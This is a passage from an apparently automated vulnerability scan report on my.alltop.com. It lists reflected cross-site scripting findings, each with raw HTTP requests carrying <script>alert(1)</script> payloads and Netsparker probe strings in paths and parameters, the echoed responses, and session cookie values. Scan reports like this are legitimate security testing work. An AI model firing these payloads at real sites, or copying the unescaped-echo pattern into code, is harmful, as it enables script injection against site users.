Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:58 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:00 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o/%22ns99c44"><script>alert(1)</script>0d4a812929a=%22netsparker(0x0001D1)" method="post" accept-charset="utf-8">
...[SNIP]...

1.182. http://my.alltop.com/alpha/o/%22ns=%22netsparker(0x0001D1) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o/%22ns=%22netsparker(0x0001D1)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf274"><script>alert(1)</script>0e0e1b8856b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o/%22ns=%22netsparker(0x0001D1)?cf274"><script>alert(1)</script>0e0e1b8856b=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:49 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:50 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:50 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o/%22ns=%22netsparker(0x0001D1)?cf274"><script>alert(1)</script>0e0e1b8856b=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.183. http://my.alltop.com/alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e246"><script>alert(1)</script>9d5efa3b171 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o8e246"><script>alert(1)</script>9d5efa3b171/%2522ns%253D%2522netsparker%25280x0001D5%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:59 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:59 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:59 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o8e246"><script>alert(1)</script>9d5efa3b171/%2522ns%253D%2522netsparker%25280x0001D5%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.184. http://my.alltop.com/alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79a20"><script>alert(1)</script>ac00e0ba843 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529)79a20"><script>alert(1)</script>ac00e0ba843 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:00 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:00 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529)79a20"><script>alert(1)</script>ac00e0ba843" method="post" accept-charset="utf-8">
...[SNIP]...

1.185. http://my.alltop.com/alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21760"><script>alert(1)</script>da0f601f8e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529)?21760"><script>alert(1)</script>da0f601f8e5=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:58 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:58 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:58 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529)?21760"><script>alert(1)</script>da0f601f8e5=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.186. http://my.alltop.com/alpha/p ['"--> parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p

Issue detail

The value of the '"--></style></script><script>netsparker(0x000208)</script> request parameter is copied into the HTML document as plain text between tags. The payload 774df<script>alert(1)</script>a6b0c385715 was submitted in the '"--></style></script><script>netsparker(0x000208)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p?'"--></style></script><script>netsparker(0x000208)</script>774df<script>alert(1)</script>a6b0c385715 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:12 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:13 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:13 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>774df<script>alert(1)</script>a6b0c385715" method="post" accept-charset="utf-8">
...[SNIP]...

1.187. http://my.alltop.com/alpha/p [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 504f0"><script>alert(1)</script>fa40e7b35cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p504f0"><script>alert(1)</script>fa40e7b35cd HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:08 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:09 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:49:09 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p504f0"><script>alert(1)</script>fa40e7b35cd" method="post" accept-charset="utf-8">
...[SNIP]...

1.188. http://my.alltop.com/alpha/p [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba66d"><script>alert(1)</script>08b950fdec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p?ba66d"><script>alert(1)</script>08b950fdec=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:07 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:08 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:49:08 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p?ba66d"><script>alert(1)</script>08b950fdec=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.189. http://my.alltop.com/alpha/p [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20c29"><script>alert(1)</script>130d5be8299 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000181)%3C/script%3E20c29"><script>alert(1)</script>130d5be8299 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:13 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:15 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:15 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000181)%3C/script%3E20c29"><script>alert(1)</script>130d5be8299" method="post" accept-charset="utf-8">
...[SNIP]...

1.190. http://my.alltop.com/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e681"><script>alert(1)</script>41158ba707c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p'%22--%3E%3C5e681"><script>alert(1)</script>41158ba707c/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
